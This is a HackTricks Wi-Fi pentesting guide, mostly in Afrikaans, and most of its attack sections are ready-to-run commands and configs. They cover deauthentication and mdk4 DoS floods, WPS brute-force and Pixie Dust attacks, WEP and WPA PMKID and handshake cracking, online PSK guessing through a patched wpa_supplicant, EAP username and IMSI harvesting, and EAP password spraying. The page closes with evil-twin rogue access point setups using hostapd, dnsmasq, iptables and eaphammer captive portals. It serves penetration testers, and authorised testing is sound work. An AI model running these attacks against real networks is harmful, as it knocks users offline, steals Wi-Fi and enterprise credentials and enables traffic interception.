Pentesting Wifi

Tip

Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks

• Kyk na die subskripsie planne!
• Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
• Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.

Wifi basiese kommando’s

ip link show #List available interfaces
iwconfig #List available interfaces
airmon-ng check kill #Kill annoying processes
airmon-ng start wlan0 #Monitor mode
airmon-ng stop wlan0mon #Managed mode
airodump-ng wlan0mon #Scan (default 2.4Ghz)
airodump-ng wlan0mon --band a #Scan 5Ghz
airodump-ng wlan0mon --wps #Scan WPS
iwconfig wlan0 mode monitor #Put in mode monitor
iwconfig wlan0mon mode managed #Quit mode monitor - managed mode
iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA" #Scan available wifis
iwlist wlan0 scan #Scan available wifis

Gereedskap

Hijacker & NexMon (Android interne Wi-Fi)

Enable Nexmon Monitor And Injection On Android

EAPHammer

git clone https://github.com/s0lst1c3/eaphammer.git
./kali-setup

Airgeddon

mv `which dhcpd` `which dhcpd`.old
apt install isc-dhcp-server
apt-get install sslstrip asleap bettercap mdk4 hostapd beef-xss lighttpd dsniff hostapd-wpe

Voer airgeddon met docker uit

docker run \
--rm \
-ti \
--name airgeddon \
--net=host \
--privileged \
-p 3000:3000 \
-v /tmp:/io \
-e DISPLAY=$(env | grep DISPLAY | awk -F "=" '{print $2}') \
v1s1t0r1sh3r3/airgeddon

Van: https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux

wifiphisher

Dit kan Evil Twin, KARMA, en Known Beacons-aanvalle uitvoer en daarna ’n phishing-sjabloon gebruik om die netwerk se regte wagwoord te verkry of sosiale netwerk-inlogbewyse af te vang.

git clone https://github.com/wifiphisher/wifiphisher.git # Download the latest revision
cd wifiphisher # Switch to tool's directory
sudo python setup.py install # Install any dependencies

Wifite2

This tool automates WPS/WEP/WPA-PSK attacks. It will automatically:

• Stel die interface in monitor mode
• Skandeer vir moontlike netwerke - en laat jou die teiken(s) kies
• Indien WEP - Begin WEP-aanvalle
• Indien WPA-PSK
• Indien WPS: Pixie dust attack en die bruteforce attack (wees versigtig — die brute-force attack kan ’n lang tyd neem). Let wel dat dit nie null PIN of database/generated PINs probeer nie.
• Probeer die PMKID van die AP vang om dit te crack
• Probeer kliënte van die AP deauthenticate om ’n handshake te capture
• Indien PMKID of Handshake, probeer bruteforce met top5000 passwords.

Attacks Summary

• DoS
• Deauthentication/disassociation – Ontkoppel almal (of ’n spesifieke ESSID/Client)
• Random fake APs – Verberg netwerke, kan skandeerders laat crash
• Overload AP – Probeer die AP uitskakel (gewoonlik nie baie nuttig nie)
• WIDS – Speel met die IDS
• TKIP, EAPOL – Sommige spesifieke aanvalle om sommige APs te DoS
• Cracking
• Crack WEP (verskeie tools en metodes)
• WPA-PSK
• WPS pin “Brute-Force”
• WPA PMKID bruteforce
• [DoS +] WPA handshake capture + Cracking
• WPA-MGT
• Username capture
• Bruteforce Credentials
• Evil Twin (with or without DoS)
• Open Evil Twin [+ DoS] – Nuttig om captive portal creds te capture en/of LAN-aanvalle uit te voer
• WPA-PSK Evil Twin – Nuttig vir netwerk-aanvalle as jy die password ken
• WPA-MGT – Nuttig om company credentials te capture
• KARMA, MANA, Loud MANA, Known beacon
• + Open – Nuttig om captive portal creds te capture en/of LAN-aanvalle uit te voer
• + WPA – Nuttig om WPA handshakes te capture

Open / OWE networks quick notes

• Passive capture op open SSIDs werk steeds met monitor mode en tcpdump:

iw wlan0 set type monitor
ip link set wlan0 up
iw wlan0 set channel 6
tcpdump -i wlan0 -w capture.pcap

• OWE (Opportunistic Wireless Encryption) voer ’n per-stasie sleutelruil uit (no PSK), sodat lugframes selfs op “open” SSIDs gekodeer is. Aangesien dit op WPA3 gebaseer is, afdwing dit ook 802.11w PMF, wat gespoofte deauth/disassoc frames blokkeer.
• OWE authentiseer nie toetreders: enigiemand kan assosieer, so verifieer client isolation in plaas daarvan om bemarkingsaansprake te vertrou. Sonder isolasie werk ARP spoofing of responder-style poisoning op die plaaslike L2 steeds.
• Evil Twin bly uitvoerbaar op open/OWE SSIDs deur ’n sterker sein aan te bied; PMF verwyder net die deauth-kortpad. As slagoffers ’n vervalste TLS cert aanvaar, word volle HTTP(S) MitM herstel.
• Broadcast poisoning op open gaste-Wi-Fi lewer maklik creds/hashes (LLMNR/NBT-NS/mDNS). Sien:

Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks

DOS

Deauthentication Packets

Description from here:.

Deauthentication-aanvalle, ’n algemene metode in Wi-Fi-hacking, behels die vervalsing van “management” frames om toestelle met krag van ’n netwerk af te koppel. Hierdie onversleutelde pakkette mislei kliënte om te dink hulle kom van die regmatige netwerk af, wat aanvallers in staat stel om WPA handshakes vir cracking te versamel of netwerkverbindings aanhoudend te ontwrig. Hierdie taktiek, ontstellend in sy eenvoud, word wyd gebruik en het beduidende implikasies vir netwerksekuriteit.

Deauthentication using Aireplay-ng

aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

• -0 beteken deauthentication
• 1 is die aantal deauths om te stuur (jy kan meerdere stuur as jy wil); 0 beteken om hulle voortdurend te stuur
• -a 00:14:6C:7E:40:80 is die MAC-adres van die access point
• -c 00:0F:B5:34:30:30 is die MAC-adres van die client om te deauthenticate; as dit weggelaat word, word ’n broadcast deauthentication gestuur (werk nie altyd nie)
• ath0 is die interface naam

Disassociation Packets

Disassociation packets, soortgelyk aan deauthentication packets, is ’n tipe management frame wat in Wi-Fi netwerke gebruik word. Hierdie packets dien om die verbinding tussen ’n toestel (soos ’n laptop of smartphone) en ’n access point (AP) te verbreek. Die primêre onderskeid tussen disassociation en deauthentication lê in hul gebruiksscenario’s. Terwyl ’n AP deauthentication packets om rogue devices eksplicitlik uit die netwerk te verwyder, disassociation packets word tipies gestuur wanneer die AP afgeskakel is, herbegin of verskuif word, en dus vereis dat alle gekoppelde nodes ontkoppel word.

Hierdie aanval kan uitgevoer word deur mdk4(mode “d”):

# -c <channel>
# -b victim_client_mac.txt contains the MAC address of the device to eliminate
# -e WifiName is the name of the wifi
# -B BSSID is the BSSID of the AP
# Notice that these and other parameters aare optional, you could give onli the ESSID and md4k will automatically search for it, wait for finding clients and deauthenticate them
mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F

Meer DOS-aanvalle deur mdk4

Sien here.

ATTACK MODE b: Beacon Flooding

Stuur beacon frames om vals APs aan kliënte te wys. Dit kan soms netwerk-skandeerders en selfs drivers laat crash!

# -a Use also non-printable caracters in generated SSIDs and create SSIDs that break the 32-byte limit
# -w n (create Open) t (Create WPA/TKIP) a (Create WPA2/AES)
# -m use real BSSIDS
# All the parameters are optional and you could load ESSIDs from a file
mdk4 wlan0mon b -a -w nta -m

ATTACK MODE a: Authentication Denial-Of-Service

Deur authentication frames na alle toeganklike Access Points (APs) binne bereik te stuur, kan hierdie APs oorlaai word, veral wanneer talle clients betrokke is. Hierdie intensiewe verkeer kan tot stelselinstabiliteit lei, wat veroorsaak dat sommige APs vries of selfs herbegin.

# -a BSSID send random data from random clients to try the DoS
# -i BSSID capture and repeat pakets from authenticated clients
# -m use real MACs
# only -a or -i can be used
mdk4 wlan0mon a [-i EF:60:69:D7:69:2F] [-a EF:60:69:D7:69:2F] -m

AANVAL MODUS p: SSID Probing and Bruteforcing

Probing Access Points (APs) kontroleer of ’n SSID korrek geopenbaar word en bevestig die AP se bereik. Hierdie tegniek, gekoppeld aan bruteforcing hidden SSIDs met of sonder ’n wordlist, help om versteekte netwerke te identifiseer en toegang daartoe te kry.

AANVAL MODUS m: Michael Countermeasures Exploitation

Deur ewekansige of duplikaatpakkette na verskillende QoS-rye te stuur, kan Michael Countermeasures op TKIP APs getrigger word, wat lei tot ’n een minuut lange AP-afskakeling. Hierdie metode is ’n effektiewe DoS (Denial of Service) aanvalstaktiek.

# -t <BSSID> of a TKIP AP
# -j use inteligent replay to create the DoS
mdk4 wlan0mon m -t EF:60:69:D7:69:2F [-j]

ATTACK MODE e: EAPOL Start and Logoff Packet Injection

Die oorlaai van ’n AP met EAPOL Start frames skep valse sessies, oorweldig die AP en blokkeer regmatige kliënte. Alternatiewelik dwing die inspuiting van valse EAPOL Logoff messages kliënte om af te koppel; albei metodes ontwrig netwerkdiens doeltreffend.

# Use Logoff messages to kick clients
mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l]

ATTACK MODE s: Attacks for IEEE 802.11s mesh networks

Verskeie aanvalle op skakelbestuur en routering in mesh-netwerke.

ATTACK MODE w: WIDS Confusion

Kruisverbinding van kliënte na meerdere WDS nodes of valse rogue APs kan Intrusion Detection and Prevention Systems manipuleer, wat verwarring en potensiële misbruik van die stelsel veroorsaak.

# -z activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
mkd4 -e <SSID> -c <channel> [-z]

ATTACK MODE f: Packet Fuzzer

A packet fuzzer wat verskeie packet sources en ’n omvattende stel modifiers vir packet manipulation bied.

Airggedon

Airgeddon bied die meeste van die aanvallings wat in die vorige kommentaar voorgestel is:

WPS

WPS (Wi‑Fi Protected Setup) vereenvoudig die proses om toestelle aan ’n router te koppel en verbeter die opstelspoed en gemak vir netwerke wat met WPA of WPA2 Personal enkripsie beskerm is. Dit is nie effektief teen die maklik gekompromitteerde WEP nie. WPS gebruik ’n 8-syfer PIN, wat in twee halfdele geverifieer word, wat dit vatbaar maak vir brute-force-aanvalle weens die beperkte aantal kombinasies (ongeveer 11 000 moontlikhede).

WPS Bruteforce

Daar is 2 hoofgereedskap om hierdie aksie uit te voer: Reaver en Bully.

• Reaver is ontwerp as ’n robuuste en praktiese aanval teen WPS, en is getoets teen ’n wye verskeidenheid access points en WPS-implementasies.
• Bully is ’n new implementation of the WPS brute force attack, geskryf in C. Dit het verskeie voordele bo die oorspronklike reaver-kode: minder dependencies, verbeterde memory- en cpu-prestasie, korrekte hantering van endianness, en ’n meer robuuste stel opsies.

Die aanval benut die WPS PIN se kwesbaarheid, veral die blootstelling van die eerste vier syfers en die laaste syfer se rol as ’n checksum, wat die brute-force-aanval vergemaklik. Verdedigings teen brute-force-aanvalle, soos blocking MAC addresses van aggressiewe aanvallers, vereis egter MAC address rotation om die aanval voort te sit.

Wanneer die WPS PIN verkry is met gereedskap soos Bully of Reaver, kan die aanvaller die WPA/WPA2 PSK aflei, wat bestendige netwerktoegang verseker.

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -b -f -N [-L -d 2] -vvroot
bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3

Smart Brute Force

Hierdie verfynde benadering mik op WPS PINs deur bekende kwesbaarhede te benut:

1. Pre-discovered PINs: Gebruik ’n databasis van bekende PINs wat gekoppel is aan spesifieke vervaardigers wat geneig is om uniforme WPS PINs te gebruik. Hierdie databasis korreleer die eerste drie oktette van MAC-addresses met waarskynlike PINs vir hierdie vervaardigers.
2. PIN Generation Algorithms: Gebruik algoritmes soos ComputePIN en EasyBox, wat WPS PINs bereken gebaseer op die AP se MAC-address. Die Arcadyan algoritme vereis bykomend ’n device ID, wat ’n ekstra laag tot die PIN-generasieproses toevoeg.

WPS Pixie Dust attack

Dominique Bongard het ’n fout ontdek in sommige toegangspunte (APs) met betrekking tot die skep van geheime kodes, bekend as nonces (E-S1 and E-S2). As hierdie nonces uitgevind kan word, word dit eenvoudig om die AP se WPS PIN te kraak. Die AP openbaar die PIN binne ’n spesiale kode (hash) om te bewys dat dit eg is en nie ’n valse (rogue) AP nie. Hierdie nonces is in wese die “sleutels” om die “kluis” te ontsluit wat die WPS PIN bevat. Meer hieroor is te vinde here.

In eenvoudige terme is die probleem dat sommige APs nie ewekansige genoeg sleutels gebruik het om die PIN te enkripteer tydens die konneksieproses nie. Dit maak die PIN kwesbaar om van buite die netwerk geraden te word (offline brute force attack).

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv
bully  wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3

As jy nie die toestel na monitor mode wil omskakel nie, of as reaver en bully ’n probleem ondervind, kan jy OneShot-C probeer. Hierdie tool kan ’n Pixie Dust attack uitvoer sonder om na monitor mode te hoef te skakel.

./oneshot -i wlan0 -K -b 00:C0:CA:78:B1:37

Null Pin attack

Sommige swak ontwerpte stelsels laat selfs ’n Null PIN (’n leë of nie-bestaande PIN) toegang verleen, wat nogal ongewoon is. Die tool Reaver kan hierdie kwesbaarheid toets, anders as Bully.

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''

Airgeddon

Al die voorgestelde WPS-aanvalle kan maklik uitgevoer word met airgeddon.

• 5 en 6 laat jou toe om jou eie PIN te probeer (as jy een het)
• 7 en 8 voer die Pixie Dust attack uit
• 13 laat jou toe om die NULL PIN te toets
• 11 en 12 sal haal die PINs wat verband hou met die geselekteerde AP uit beskikbare databasisse en genereer moontlike PINs gebruik makend van: ComputePIN, EasyBox en opsioneel Arcadyan (aanbeveel, hoekom nie?)
• 9 en 10 sal elke moontlike PIN toets

WEP

Hoekom dit ineenstort

• RC4 seed is net IV (24 bits) + shared key. Die IV is cleartext, klein (2^24), en herhaal vinnig, so ciphertexts met dieselfde IV hergebruik die keystream.
• XORing two ciphertexts with the same keystream leaks PlaintextA ⊕ PlaintextB; voorspelbare headers + RC4 KSA biases (FMS) laat jou “vote” key bytes. PTW optimaliseer dit deur ARP traffic te gebruik om die vereistes te verlaag na tienduisende packets in plaas van miljoene.
• Integriteit is slegs CRC32 (linear/unkeyed), so ’n aanvaller kan bits flip en CRC32 herbereken sonder die sleutel → packet forgery/replay/ARP injection terwyl hy vir IVs wag.

Praktiese kraak is deterministies:

airodump-ng --bssid <BSSID> --channel <ch> --write wep_capture wlan1mon  # collect IVs
# optionally speed up IVs without deauth by replaying ARP
aireplay-ng --arpreplay -b <BSSID> -h <clientMAC> wlan1mon
aircrack-ng wep_capture-01.cap  # PTW attack recovers key once IV threshold is met

Airgeddon bevat nog steeds “All-in-One” WEP-werkvloei as jy ’n begeleide UI verkies.

WPA/WPA2 PSK

PMKID

In 2018 het hashcat revealed ’n nuwe aanvalsmethode bekendgemaak, uniek omdat dit net een enkele pakket benodig en nie vereis dat enige kliënte aan die teikeng AP gekoppel is nie — net interaksie tussen die aanvaller en die AP.

Baie moderne routers voeg ’n opsionele veld by die eerste EAPOL-raam tydens assosiasie, bekend as Robust Security Network. Dit sluit die PMKID in.

Soos die oorspronklike pos verduidelik, word die PMKID geskep met behulp van bekende data:

PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

Aangesien die “PMK Name” konstant is, en ons die BSSID van die AP en die station ken, en die PMK identies is aan dié van ’n volledige 4-way handshake, kan hashcat hierdie inligting gebruik om die PSK te crack en die passphrase te herstel!

Om hierdie inligting te gather en plaaslik die wagwoord te bruteforce, kan jy doen:

airmon-ng check kill
airmon-ng start wlan0
git clone https://github.com/ZerBea/hcxdumptool.git; cd hcxdumptool; make; make install
hcxdumptool -o /tmp/attack.pcap -i wlan0mon --enable_status=1

#You can also obtains PMKIDs using eaphammer
./eaphammer --pmkid --interface wlan0 --channel 11 --bssid 70:4C:A5:F8:9A:C1

Die PMKIDs captured sal in die console vertoon en ook gestoor binne _ /tmp/attack.pcap_
Skakel nou die capture na hashcat/john formaat en crack dit:

hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

Neem asseblief kennis dat die formaat van ’n korrekte hash uit 4 dele bestaan, soos: 4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7566f6461666f6e65436f6e6e6563743034383131343838 As joune slegs 3 dele bevat, is dit ongeldig (die PMKID capture was nie geldig nie).

Let wel dat hcxdumptool ook capture handshakes (iets soos dit sal verskyn: MP:M1M2 RC:63258 EAPOLTIME:17091). Jy kan die handshakes transformeer na hashcat/john formaat met cap2hccapx

tcpdump -r /tmp/attack.pcapng -w /tmp/att.pcap
cap2hccapx pmkid.pcapng pmkid.hccapx ["Filter_ESSID"]
hccap2john pmkid.hccapx > handshake.john
john handshake.john --wordlist=/usr/share/wordlists/rockyou.txt
aircrack-ng /tmp/att.pcap -w /usr/share/wordlists/rockyou.txt #Sometimes

Ek het opgemerk dat sommige handshakes wat met hierdie tool captured is nie cracked kon word nie, selfs al is die korrekte password bekend. Ek beveel aan om handshakes ook via die tradisionele manier te capture indien moontlik, of verskeie daarvan met hierdie tool te capture.

Handshake capture

’n Aanval op WPA/WPA2 netwerke kan uitgevoer word deur ’n handshake te capture en te probeer die password offline te crack. Hierdie proses behels die monitor van die kommunikasie van ’n spesifieke netwerk en die BSSID op ’n bepaalde channel. Hier is ’n gestroomlynde gids:

1. Identifiseer die BSSID, channel, en ’n connected client van die teiken-netwerk.
2. Gebruik airodump-ng om die netwerkverkeer op die gespesifiseerde channel en BSSID te monitor, in die hoop om ’n handshake te capture. Die opdrag sal soos volg lyk:

airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap

3. Om die kans om ’n handshake te vang te verhoog, ontkoppel die kliënt kortstondig van die netwerk om ’n re-authentication af te dwing. Dit kan gedoen word met die aireplay-ng-opdrag, wat deauthentication packets na die kliënt stuur:

aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, may not work in all scenarios

Let daarop dat aangesien die client deauthenticated was, kan dit probeer om met ’n ander AP te verbind of, in ander gevalle, met ’n ander netwerk.

Sodra in die airodump-ng sekere handshake-inligting verskyn, beteken dit dat die handshake vasgevang is en jy kan ophou luister:

Sodra die handshake vasgevang is, kan jy dit met aircrack-ng crack:

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap

Kontroleer of daar ’n handshake in die lêer is

aircrack

aircrack-ng psk-01.cap #Search your bssid/essid and check if any handshake was capture

tshark

tshark -r psk-01.cap -n -Y eapol #Filter handshake messages #You should have the 4 messages.

cowpatty

cowpatty -r psk-01.cap -s "ESSID" -f -

As hierdie tool ’n onvoltooide handshake van ’n ESSID vind voordat die voltooide een gevind is, sal dit nie die geldige een opspoor nie.

pyrit

apt-get install pyrit #Not working for newer versions of kali
pyrit -r psk-01.cap analyze

Vinniger aanlyn PSK guessing via wpa_supplicant ctrl socket (no clients/PMKID)

Wanneer geen clients naby is en die AP PMKID weier, kan jy PSKs aanlyn deurloop sonder om supplicants te respawn:

• Pas wpa_supplicant.c aan om dur = 0; af te dwing in die auth failure backoff logic (omtrent ssid->auth_failures), wat effektief die temporary-disable timer deaktiveer.
• Start ’n enkele daemon met ’n control socket:

# wpa_supplicant.conf
ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=root
update_config=1

wpa_supplicant -B -i wlp3s0 -c wpa_supplicant.conf

• Bestuur dit via die control interface, hergebruik dieselfde scan en network:

ADD_NETWORK
SET_NETWORK 0 ssid "<ssid>"
ENABLE_NETWORK 0
SCAN
(loop)
SET_NETWORK 0 psk "<candidate>"
REASSOCIATE
wait for CTRL-EVENT-CONNECTED / DISCONNECTED

’n Klein Python-lus wat socket-gebeurtenisse lees (CTRL-EVENT-CONNECTED / CTRL-EVENT-DISCONNECTED) kan ongeveer 100 gokpogings in ~5 minute toets sonder scan-overhoof. Dit is steeds lawaaierig en opspoorbaar, maar vermy per-poging proses-herlaaie en backoff delays.

WPA Enterprise (MGT)

In enterprise WiFi-opstellings sal jy verskeie verifikasie-metodes teëkom, elk wat verskillende veiligheidsvlakke en bestuursfunksies bied. Wanneer jy gereedskap soos airodump-ng gebruik om netwerkverkeer te ondersoek, mag jy identifiseerders vir hierdie verifikasie-tipes opmerk. Sommige algemene metodes sluit in:

6A:FE:3B:73:18:FB  -58       19        0    0   1  195  WPA2 CCMP   MGT  NameOfMyWifi

1. EAP-GTC (Generic Token Card):

• Hierdie metode ondersteun hardware tokens en one-time passwords binne EAP-PEAP. Anders as MSCHAPv2, gebruik dit nie ‘n peer challenge’ nie en stuur wagwoorde in plaintext na die access point, wat ’n risiko veroorsaak vir downgrade-aanvalle.

2. EAP-MD5 (Message Digest 5):

• Betrek die stuur van die MD5-hash van die wagwoord vanaf die kliënt. Dit word nie aanbeveel weens kwesbaarheid vir woordeboek-aanvalle, gebrek aan server-authentisering, en onmoontlikheid om sessiespesifieke WEP-sleutels te genereer.

3. EAP-TLS (Transport Layer Security):

• Gebruik beide kliënt- en server-side sertifikate vir authentisering en kan dinamies user-based en session-based WEP-sleutels genereer om kommunikasie te beveilig.

4. EAP-TTLS (Tunneled Transport Layer Security):

• Verskaf wederkerige authentisering deur ’n enkripsie-tunnel, saam met ’n metode om dinamiese, per-user, per-session WEP-sleutels af te lei. Dit vereis slegs server-side sertifikate, terwyl kliënte kredensiale gebruik.

5. PEAP (Protected Extensible Authentication Protocol):

• Werk soortgelyk aan EAP deur ’n TLS-tunnel te skep vir beskermde kommunikasie. Dit laat die gebruik van swakere authentiseringsprotokolle bo-op EAP toe as gevolg van die beskerming wat die tunnel bied.
• PEAP-MSCHAPv2: Gereeld na verwys as PEAP, kombineer dit die kwesbare MSCHAPv2 challenge/response-meganisme met ’n beskermende TLS-tunnel.
• PEAP-EAP-TLS (or PEAP-TLS): Soortgelyk aan EAP-TLS maar begin ’n TLS-tunnel voordat sertifikate uitgeruil word, wat ’n addisionele sekuriteitslaag bied.

You can find more information about these authentication methods here and here.

Username Capture

Reading https://tools.ietf.org/html/rfc3748#page-27 dit lyk of as jy EAP gebruik die “Identity” messages moet supported wees, en die username gaan in clear gestuur word in die “Response Identity” messages.

Selfs wanneer een van die veiligste authentiseringsmetodes gebruik word: PEAP-EAP-TLS, is dit moontlik om die username wat in die EAP-protokol gestuur is te capture. Om dit te doen, capture ‘n authentication communication’ (begin airodump-ng binne ’n channel en wireshark in dieselfde interface) en filter die pakkette met eapol.
Binne die “Response, Identity” packet, sal die username van die kliënt verskyn.

Anonymous Identities

Identity hiding word ondersteun deur beide EAP-PEAP en EAP-TTLS. In die konteks van ’n WiFi-netwerk word ’n EAP-Identity request gewoonlik geïnisieer deur die access point (AP) tydens die association-proses. Om die beskerming van gebruiker-anonimiteit te verseker, bevat die response van die EAP-kliënt op die gebruiker se toestel slegs die essensiële inligting wat benodig word vir die aanvanklike RADIUS-server om die versoek te verwerk. Hierdie konsep word geïllustreer deur die volgende scenario’s:

• EAP-Identity = anonymous
• In hierdie scenario gebruik alle gebruikers die pseudonieme “anonymous” as hul user identifier. Die aanvanklike RADIUS-server funksioneer as óf ’n EAP-PEAP óf EAP-TTLS server, verantwoordelik vir die bestuur van die server-side van die PEAP of TTLS-protokol. Die inner (protected) authentiseringsmetode word dan of plaaslik hanteer of gedelegeer na ’n remote (home) RADIUS-server.
• EAP-Identity = anonymous@realm_x
• In hierdie situasie verberg gebruikers van verskillende realms hul identiteite terwyl hulle hul onderskeie realms aandui. Dit laat die aanvanklike RADIUS-server toe om die EAP-PEAP of EAP-TTLS versoeke te proxy na RADIUS-servers in hul home realms, wat as die PEAP of TTLS server optree. Die aanvanklike RADIUS-server funksioneer slegs as ’n RADIUS relay node.
• Alternatiewelik kan die aanvanklike RADIUS-server funksioneer as die EAP-PEAP of EAP-TTLS server en óf die protected authentiseringsmetode hanteer óf dit aan ’n ander server deurstuur. Hierdie opsie fasiliteer die konfigurasie van verskillende beleide vir verskeie realms.

In EAP-PEAP, sodra die TLS-tunnel gevestig is tussen die PEAP server en die PEAP kliënt, inisieer die PEAP server ’n EAP-Identity request en stuur dit deur die TLS-tunnel. Die kliënt reageer op hierdie tweede EAP-Identity request deur ’n EAP-Identity response te stuur wat die gebruiker se ware identiteit deur die enkripsie-tunnel bevat. Hierdie benadering voorkom effektief dat iemand wat op die 802.11-verkeer afluister die gebruiker se werklike identiteit kan sien.

EAP-TTLS volg ’n effens ander prosedure. Met EAP-TTLS authentiseer die kliënt gewoonlik met PAP of CHAP, beveilig deur die TLS-tunnel. In hierdie geval sluit die kliënt ’n User-Name attribute en óf ’n Password óf CHAP-Password attribute in die aanvanklike TLS-bericht wat gestuur word na tunneling.

Ongeag die gekose protokol, kry die PEAP/TTLS server kennis van die gebruiker se werklike identiteit nadat die TLS-tunnel gevestig is. Die werklike identiteit kan voorgestel word as user@realm of eenvoudig user. Indien die PEAP/TTLS server ook verantwoordelik is vir die authentisering van die gebruiker, het dit nou die gebruiker se identiteit en gaan voort met die authentiseringsmetode beskerm deur die TLS-tunnel. Alternatiewelik kan die PEAP/TTLS server ’n nuwe RADIUS-versoek na die gebruiker se home RADIUS-server stuur. Hierdie nuwe RADIUS-versoek laat die PEAP of TTLS protokollaag uit. In gevalle waar die protected authentiseringsmetode EAP is, word die inner EAP-boodskappe na die home RADIUS-server gestuur sonder die EAP-PEAP of EAP-TTLS omhulsel. Die User-Name attribute van die uitgaande RADIUS-bericht bevat die gebruiker se ware identiteit, wat die anonymous User-Name van die inkomende RADIUS-versoek vervang. Wanneer die protected authentiseringsmetode PAP of CHAP is (slegs deur TTLS ondersteun), word die User-Name en ander authentisering-attribuite wat uit die TLS-payload gehaal is, vervang in die uitgaande RADIUS-bericht, en neem die plek in van die anonymous User-Name en TTLS EAP-Message attributes in die inkomende RADIUS-versoek.

For more info check https://www.interlinknetworks.com/app_notes/eap-peap.htm

SIM-based EAP (EAP-SIM/EAP-AKA) identity leakage (IMSI exposure)

SIM-based Wi‑Fi authentication using EAP‑SIM/EAP‑AKA over 802.1X can leak the permanent subscriber identifier (IMSI) in cleartext during the unauthenticated identity phase if the deployment doesn’t implement pseudonyms/protected identities or a TLS tunnel around the inner EAP.

Where the leak happens (high level):

• 802.11 association completes to the SSID (often carrier offload SSIDs like FreeWifi_secure, eduroam-like operator realms, etc.).
• Authenticator sends EAP-Request/Identity.
• Vulnerable clients answer EAP-Response/Identity with their permanent identity = IMSI encoded as a 3GPP NAI, prior to any protection.
• Example NAI: 20815XXXXXXXXXX@wlan.mnc015.mcc208.3gppnetwork.org
• Anyone passively listening to RF can read that frame. No 4-way handshake or TLS keying is needed.

Quick PoC: passive IMSI harvesting on EAP‑SIM/AKA networks lacking identity privacy

</details>

Notas:
- Werk voor enige TLS‑tonnel as die implementering direk EAP‑SIM/AKA gebruik sonder beskermde identiteit/pseudonieme.
- Die blootgestelde waarde is ’n permanente identifiseerder wat aan die intekenaar se SIM gekoppel is; versameling daarvan maak langtermyn‑opsporing en daaropvolgende telekommunikasie‑misbruik moontlik.

Impak
- Privaatheid: volgehoue gebruiker-/toestelopsporing deur passiewe Wi‑Fi‑vaslegging in openbare plekke.
- Telekommunikasie‑misbruik‑beginpunt: met die IMSI kan ’n aanvaller met SS7/Diameter‑toegang ligging navraag doen of probeer oproep/SMS‑afluistering en MFA‑diefstal uitvoer.

Versagtingsmaatreëls / waarna om te kyk
- Bevestig dat kliënte anonieme buitenste identiteite (pseudonieme) vir EAP‑SIM/AKA gebruik volgens 3GPP‑riglyne (bv. 3GPP TS 33.402).
- Verkies om die identiteitsfase te tonnel (bv. EAP‑TTLS/PEAP wat innerlike EAP‑SIM/AKA dra) sodat die IMSI nooit onversleuteld gestuur word nie.
- Packet captures of association/auth moet nooit ’n rou IMSI in EAP-Response/Identity openbaar nie.

Verwant: Uitbuiting van telekommunikasie‑signalisering met vasgevangen mobiele identifiseerders
<a class="content_ref" href="../pentesting-network/telecom-network-exploitation.md"><span class="content_ref_label">Telecom Network Exploitation</span></a>

### EAP-Bruteforce (password spray)

If the client is expected to use a **username and password** (notice that **EAP-TLS won't be valid** in this case), then you could try to get a **list** a **usernames** (see next part) and **passwords** and try to **bruteforce** the access using [**air-hammer**](https://github.com/Wh1t3Rh1n0/air-hammer)**.**
```bash
./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt

./eaphammer --eap-spray \
--interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
--essid example-wifi \
--password bananas \
--user-list users.txt

apt-get install dnsmasq #Manages DHCP and DNS

interface=wlan0
dhcp-authoritative
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

dnsmasq -C dnsmasq.conf -d

apt-get install hostapd

interface=wlan0
driver=nl80211
ssid=MITIWIFI
hw_mode=g
channel=11
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wpa=2
wpa_passphrase=mitmwifi123
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=86400
ieee80211n=1
wme_enabled=1

airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
hostapd ./hostapd.conf

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward

airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon

./eaphammer -i wlan0 --essid exampleCorp --captive-portal

